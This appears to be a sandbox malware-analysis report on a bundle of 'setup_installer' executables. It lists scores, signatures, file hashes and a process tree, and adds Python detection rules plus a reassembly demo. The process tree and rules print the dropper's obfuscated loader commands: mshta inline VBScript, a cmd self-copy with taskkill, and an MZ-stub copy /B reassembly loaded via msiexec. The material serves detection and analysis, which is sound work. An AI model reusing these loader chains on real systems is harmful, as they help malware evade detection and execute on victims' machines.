Overview
Score: 10

Static: 10

Behavioral tasks (sample, platform, score)
setup_inst...32.exe (windows7_x64): 10
setup_inst...32.exe (windows10_x64): 10
setup_inst...2b.exe (windows7_x64): 8
setup_inst...2b.exe (windows10_x64): 8
setup_inst...61.exe (windows7_x64): 10
setup_inst...61.exe (windows10_x64): 10
setup_inst...f8.exe (windows7_x64): 10
setup_inst...f8.exe (windows10_x64): 10
setup_inst...34.exe (windows7_x64): 10
setup_inst...34.exe (windows10_x64): 10
setup_inst...c2.exe (windows7_x64): 3
setup_inst...c2.exe (windows10_x64): 10
setup_inst...cb.exe (windows7_x64): 10
setup_inst...cb.exe (windows10_x64): 10
setup_inst...90.exe (windows7_x64): 10
setup_inst...90.exe (windows10_x64): 10
setup_inst...79.exe (windows7_x64): 6
setup_inst...79.exe (windows10_x64): 6
setup_inst...d8.exe (windows7_x64): 7
setup_inst...d8.exe (windows10_x64): 3
setup_inst...3b.exe (windows7_x64): 8
setup_inst...3b.exe (windows10_x64): 8
setup_inst...ac.exe (windows7_x64): 10
setup_inst...ac.exe (windows10_x64): 10
setup_inst...38.exe (windows7_x64): 10
setup_inst...38.exe (windows10_x64): 10
setup_inst...b5.exe (windows7_x64): 10
setup_inst...b5.exe (windows10_x64): 10
setup_inst...b2.exe (windows7_x64): 7
setup_inst...b2.exe (windows10_x64): 7
setup_inst...rl.dll (windows7_x64): 3
setup_inst...rl.dll (windows10_x64): 3

Analysis
max time kernel: 119s
max time network: 119s
submitted: 01-01-1970 00:00
Behavioral tasks (task, sample, resource)
behavioral1: setup_installer/Wed0901eb1dae126e32.exe (win7-en-20211014)
behavioral2: setup_installer/Wed0901eb1dae126e32.exe (win10-en-20210920)
behavioral3: setup_installer/Wed094c47c32b.exe (win7-en-20211014)
behavioral4: setup_installer/Wed094c47c32b.exe (win10-en-20210920)
behavioral5: setup_installer/Wed096a1bff61.exe (win7-en-20211014)
behavioral6: setup_installer/Wed096a1bff61.exe (win10-en-20210920)
behavioral7: setup_installer/Wed0971f17486f8.exe (win7-en-20210920)
behavioral8: setup_installer/Wed0971f17486f8.exe (win10-en-20211014)
behavioral9: setup_installer/Wed09977fdc12334.exe (win7-en-20210920)
behavioral10: setup_installer/Wed09977fdc12334.exe (win10-en-20211014)
behavioral11: setup_installer/Wed09abf83d9c2.exe (win7-en-20210920)
behavioral12: setup_installer/Wed09abf83d9c2.exe (win10-en-20210920)
behavioral13: setup_installer/Wed09b2a8bc4f16cb.exe (win7-en-20211014)
behavioral14: setup_installer/Wed09b2a8bc4f16cb.exe (win10-en-20210920)
behavioral15: setup_installer/Wed09b3a5ca1a712d390.exe (win7-en-20211014)
behavioral16: setup_installer/Wed09b3a5ca1a712d390.exe (win10-en-20210920)
behavioral17: setup_installer/Wed09c42cad92c20f79.exe (win7-en-20211014)
behavioral18: setup_installer/Wed09c42cad92c20f79.exe (win10-en-20210920)
behavioral19: setup_installer/Wed09cfb2f9758281d8.exe (win7-en-20211014)
behavioral20: setup_installer/Wed09cfb2f9758281d8.exe (win10-en-20210920)
behavioral21: setup_installer/Wed09d27135e5a8b3b.exe (win7-en-20210920)
behavioral22: setup_installer/Wed09d27135e5a8b3b.exe (win10-en-20211014)
behavioral23: setup_installer/Wed09d8d6edfaff2ac.exe (win7-en-20210920)
behavioral24: setup_installer/Wed09d8d6edfaff2ac.exe (win10-en-20211014)
behavioral25: setup_installer/Wed09db0d52c38.exe (win7-en-20210920)
behavioral26: setup_installer/Wed09db0d52c38.exe (win10-en-20210920)
behavioral27: setup_installer/Wed09e95ff6b5.exe (win7-en-20211014)
behavioral28: setup_installer/Wed09e95ff6b5.exe (win10-en-20210920)
behavioral29: setup_installer/Wed09f257bb7877d00b2.exe (win7-en-20211014)
behavioral30: setup_installer/Wed09f257bb7877d00b2.exe (win10-en-20210920)
behavioral31: setup_installer/libcurl.dll (win7-en-20211014)
behavioral32: setup_installer/libcurl.dll (win10-en-20210920)
General
Target: setup_installer/Wed094c47c32b.exe

Malware Config

Signatures
- Executes dropped EXE (1 IoC)
  pid 1896  XYB0bVL96aEKhA.exE
- Loads dropped DLL (2 IoCs)
  pid 316   cmd.exe
  pid 1068  msiexec.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Kills process with taskkill (1 IoC)
  pid 1764  taskkill.exe
- Modifies Internet Explorer settings (2 IoCs)
  mshta.exe  Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main
  mshta.exe  Key created \REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Internet Explorer\Main
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  pid 1764  taskkill.exe  Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  writer pid / process             target pid / process        writes
  560   Wed094c47c32b.exe      ->  764   mshta.exe               7
  764   mshta.exe              ->  316   cmd.exe                 7
  316   cmd.exe                ->  1896  XYB0bVL96aEKhA.exE      7
  316   cmd.exe                ->  1764  taskkill.exe            7
  1896  XYB0bVL96aEKhA.exE     ->  1816  mshta.exe               7
  1816  mshta.exe              ->  1520  cmd.exe                 7
  1896  XYB0bVL96aEKhA.exE     ->  2028  mshta.exe               7
  2028  mshta.exe              ->  1332  cmd.exe                 7
  1332  cmd.exe                ->  1892  cmd.exe                 7
  1332  cmd.exe                ->  1316  cmd.exe                 1 (list ends at the 64-entry cap)
Processes
(PIDs are taken from the signature IoCs above; the two cmd.exe children of pid 1332 are pids 1892 and 1316, order not recorded.)

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe (pid 560)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\mshta.exe (pid 764)
    cmdline: "C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (pid 316)
      cmdline: "C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE (pid 1896)
        cmdline: XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\mshta.exe (pid 1816)
          cmdline: "C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))
          - Modifies Internet Explorer settings
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\cmd.exe (pid 1520)
            cmdline: "C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"
        C:\Windows\SysWOW64\mshta.exe (pid 2028)
          cmdline: "C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))
          - Modifies Internet Explorer settings
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\cmd.exe (pid 1332)
            cmdline: "C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /S /D /c" EcHO "
            C:\Windows\SysWOW64\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"
            C:\Windows\SysWOW64\msiexec.exe (pid 1068)
              cmdline: msiexec.exe -y .\PEQQN6S.OU
              - Loads dropped DLL
      C:\Windows\SysWOW64\taskkill.exe (pid 1764)
        cmdline: taskkill -f -im "Wed094c47c32b.exe"
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
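The process tree above is the whole loader chain in one place: mshta.exe runs inline VBScript that shells out to cmd.exe; cmd copies the original executable to a random name with TYPE, restarts the copy with a marker argument (/Pgxf5hQhM5tF) and kills the original by image name with taskkill; the second stage writes the two bytes "MZ" with echo | set /p, concatenates them with two dropped fragments using copy /B, and loads the result through msiexec -y, which calls DllRegisterServer on the module. The Python below is an added example, not part of this report or of the sandbox that produced it: a small rule set run over process-creation events. The events are constructed from the PIDs and command lines shown in this report (field names follow a Sysmon Event ID 1 record); the two benign events at the end are made up to show the rules stay quiet on ordinary cmd/msiexec use. Rule names and helper names are my own.

```python
"""Process-creation rules for the mshta -> cmd -> msiexec loader chain in this report.

Added example, not part of the sandbox report or its tooling.  EVENTS is constructed
from the PIDs and command lines shown in the report's process tree; the last two
events are made-up benign activity used as negative cases.
"""
import re

EVENTS = [
    {"pid": 560, "ppid": 0, "image": r"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"'},
    {"pid": 764, "ppid": 560, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))'},
    {"pid": 316, "ppid": 764, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"'},
    {"pid": 1764, "ppid": 316, "image": r"C:\Windows\SysWOW64\taskkill.exe",
     "cmdline": r'taskkill -f -im "Wed094c47c32b.exe"'},
    {"pid": 1896, "ppid": 316, "image": r"C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE",
     "cmdline": r"XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF"},
    {"pid": 2028, "ppid": 1896, "image": r"C:\Windows\SysWOW64\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))'},
    {"pid": 1332, "ppid": 2028, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t'},
    {"pid": 1068, "ppid": 1332, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r"msiexec.exe -y .\PEQQN6S.OU"},
    # Constructed benign events: a normal package install and an ordinary file copy.
    {"pid": 4000, "ppid": 900, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\Users\Admin\Downloads\example-app.msi" /qn'},
    {"pid": 4001, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy /y report.txt backup\report.txt"},
]


def normalize(cmdline: str) -> str:
    """Lower-case and collapse whitespace: the dropper's random casing and spacing
    (cOPY /B, tyPE, SEt /p, trUe) are cosmetic and must not defeat the patterns."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# (rule name, image the rule applies to, pattern matched against the normalized command line)
RULES = [
    # mshta executing inline VBScript that shells out via WScript.Shell.Run
    ("mshta_inline_vbscript_shell", "mshta.exe",
     re.compile(r'vbscript:.*createobject\s*\(\s*"wscript\.shell"\s*\)\s*\.\s*run\s*\(')),
    # cmd copying an .exe with TYPE, starting the copy, then killing the original by image name
    ("cmd_type_selfcopy_taskkill", "cmd.exe",
     re.compile(r'type\s+"[^"]+\.exe"\s*>\s*\S+.*\bstart\b.*taskkill\s+[-/]f\s+[-/]im\b')),
    # "MZ" written with echo|set /p, glued to fragments with copy /b, result handed to msiexec -y
    ("cmd_mz_stub_copyb_msiexec", "cmd.exe",
     re.compile(r'set\s*/p\s*=\s*"?mz"?\s*>.*copy\s+(?:/[by]\s+)+\S+\+\S+.*msiexec(?:\.exe)?\s+[-/]y\b')),
    # msiexec /y runs DllRegisterServer on the module; group 1 or 2 captures the module path
    ("msiexec_y_non_dll_module", "msiexec.exe",
     re.compile(r'[-/]y\s+(?:"([^"]+)"|(\S+))')),
]


def scan(events: list[dict]) -> list[tuple[str, int]]:
    """Return (rule name, pid) for every event that trips a rule written for its image."""
    alerts = []
    for ev in events:
        img, cmd = image_name(ev["image"]), normalize(ev["cmdline"])
        for name, target, pattern in RULES:
            if img != target:
                continue
            m = pattern.search(cmd)
            if not m:
                continue
            # Self-registering a real .dll is normal installer behaviour; flag other extensions only.
            if name == "msiexec_y_non_dll_module" and (m.group(1) or m.group(2)).endswith(".dll"):
                continue
            alerts.append((name, ev["pid"]))
    return alerts


def parent_chain(events: list[dict], pid: int) -> list[str]:
    """Walk ppid links back to the root so an alert can be shown with its ancestry."""
    by_pid = {ev["pid"]: ev for ev in events}
    chain = []
    while pid in by_pid:
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


if __name__ == "__main__":
    for rule, pid in scan(EVENTS):
        print(f"{rule:28} pid {pid:<5} {' <- '.join(parent_chain(EVENTS, pid))}")
```

Normalising case and whitespace before matching matters more than the patterns themselves: every token in the chain is randomly cased precisely to break naive string matches. The msiexec rule is deliberately narrow, since /y on a .dll is how legitimate installers self-register; only a module without a .dll extension is flagged, and restricting the path to user-writable directories is the obvious next refinement.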
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Users\Admin\AppData\Local\Temp\9Odf.6
  MD5     b259839b9455f04e8299f22cebe3274f
  SHA1    30bbbc8d5089648c8c5425c23874976ba2e07b34
  SHA256  edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89
  SHA512  3de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d

C:\Users\Admin\AppData\Local\Temp\OsuKT1.9t
  MD5     ac6ad5d9b99757c3a878f2d275ace198
  SHA1    439baa1b33514fb81632aaf44d16a9378c5664fc
  SHA256  9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
  SHA512  bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\PEQQN6S.OU
  MD5     a2feb31d070b6920981b5461baa1ef81
  SHA1    8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7
  SHA256  ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950
  SHA512  b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
  MD5     b5cfd3a9dc9e645e24c79991bca60460
  SHA1    0d6bcdca2121d279bbe87c66cab515ac2478f555
  SHA256  852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
  SHA512  55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

C:\Users\Admin\AppData\Local\Temp\xrB2l6FD.ilF
  MD5     cd4352def1a81b4fe232eeb2c77dbc57
  SHA1    9fb4f9a790efe3676915699bdc89ba0a06ce8210
  SHA256  93589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c
  SHA512  1b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e

\Users\Admin\AppData\Local\Temp\PEQqN6S.Ou
  MD5     a2feb31d070b6920981b5461baa1ef81
  SHA1    8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7
  SHA256  ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950
  SHA512  b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
  MD5     b5cfd3a9dc9e645e24c79991bca60460
  SHA1    0d6bcdca2121d279bbe87c66cab515ac2478f555
  SHA256  852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
  SHA512  55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
memory/316-58-0x0000000000000000-mapping.dmp
memory/560-55-0x00000000754F1000-0x00000000754F3000-memory.dmp (8KB)
memory/764-56-0x0000000000000000-mapping.dmp
memory/1068-86-0x0000000000AC0000-0x0000000000C58000-memory.dmp (1.6MB)
memory/1068-88-0x0000000000C60000-0x0000000000D15000-memory.dmp (724KB)
memory/1068-87-0x0000000002640000-0x000000000276B000-memory.dmp (1.2MB)
memory/1068-82-0x0000000000000000-mapping.dmp
memory/1068-89-0x0000000002770000-0x000000000281F000-memory.dmp (700KB)
memory/1068-90-0x0000000002820000-0x00000000028BA000-memory.dmp (616KB)
memory/1316-76-0x0000000000000000-mapping.dmp
memory/1332-73-0x0000000000000000-mapping.dmp
memory/1520-68-0x0000000000000000-mapping.dmp
memory/1764-64-0x0000000000000000-mapping.dmp
memory/1816-66-0x0000000000000000-mapping.dmp
memory/1892-75-0x0000000000000000-mapping.dmp
memory/1896-61-0x0000000000000000-mapping.dmp
memory/2028-71-0x0000000000000000-mapping.dmp
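The second-stage command line in the process tree (echo | set /p = "MZ" > OsuKT1.9t, then copy /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou, then msiexec.exe -y .\PEQQN6S.OU) stores the module with its first two bytes removed, so neither dropped fragment carries an MZ header until the copy runs and the three files listed above are glued back together. The Python below is an added example, not from this report or the sandbox, that reproduces the reassembly and the header check an analyst would run on the downloaded files before handing PEQqN6S.Ou to a disassembler. Because only hashes are available here, the "DLL" is a constructed PE-shaped stub; the function names are my own.

```python
"""Rebuild the msiexec -y module the way the report's cmd chain does, then sanity-check it.

Added example, not part of the sandbox report.  The chain
    echo | set /p = "MZ" > OsuKT1.9t
    copy /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou
    msiexec.exe -y .\PEQQN6S.OU
writes a two-byte "MZ" stub, concatenates it with two dropped fragments and asks
msiexec to DllRegisterServer the result.  Keeping the PE on disk without its first
two bytes means no dropped file starts with an MZ header until the copy runs.
The payload bytes below are constructed; an analyst would read the three files
from the report's download list instead.
"""
import hashlib
import struct


def build_fake_dll(size: int = 0x200) -> bytes:
    """Minimal PE-shaped blob: MZ magic, e_lfanew at offset 0x3C, 'PE\\0\\0' + i386 machine word.
    Constructed stand-in for the real module, whose bytes the report does not include."""
    e_lfanew = 0x80
    img = bytearray(size)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", img, e_lfanew + 4, 0x014C)  # IMAGE_FILE_MACHINE_I386
    return bytes(img)


def mz_stub() -> bytes:
    """What 'echo | set /p = "MZ" > file' leaves on disk: the prompt text, no trailing newline."""
    return b"MZ"


def split_like_dropper(dll: bytes, cut: int) -> tuple[bytes, bytes, bytes]:
    """Split as the dropper stores it: the 'MZ' stub, fragment 1 (XRB2l6FD.IlF), fragment 2 (9Odf.6)."""
    return dll[:2], dll[2:cut], dll[cut:]


def reassemble(*parts: bytes) -> bytes:
    """copy /B a+b+c out: plain binary concatenation in argument order, no separators."""
    return b"".join(parts)


def looks_like_pe(blob: bytes) -> bool:
    """The check a magic-based scanner does: MZ at 0, then 'PE\\0\\0' at the e_lfanew offset."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    return 0x40 <= e_lfanew <= len(blob) - 4 and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def digests(blob: bytes) -> dict[str, str]:
    """Same four digests the report lists per dropped file, for side-by-side comparison."""
    return {name: hashlib.new(name, blob).hexdigest() for name in ("md5", "sha1", "sha256", "sha512")}


if __name__ == "__main__":
    dll = build_fake_dll()
    stub, frag1, frag2 = split_like_dropper(dll, cut=0x100)
    rebuilt = reassemble(stub, frag1, frag2)
    print("stub / fragments look like PE:", looks_like_pe(stub), looks_like_pe(frag1), looks_like_pe(frag2))
    print("rebuilt looks like PE:", looks_like_pe(rebuilt), "identical to original:", rebuilt == dll)
    print("stub digests (compare with the report's OsuKT1.9t entry):", digests(mz_stub()))
```

Run against the real files, digests(reassemble(stub, frag1, frag2)) should reproduce the report's hashes for PEQQN6S.OU, and digests(mz_stub()) should match the OsuKT1.9t entry if set /p wrote exactly the two bytes MZ. A mismatch on the stub (a stray space or newline) would also explain a rebuilt module that msiexec refuses to load, so it is worth checking before spending time on the fragments.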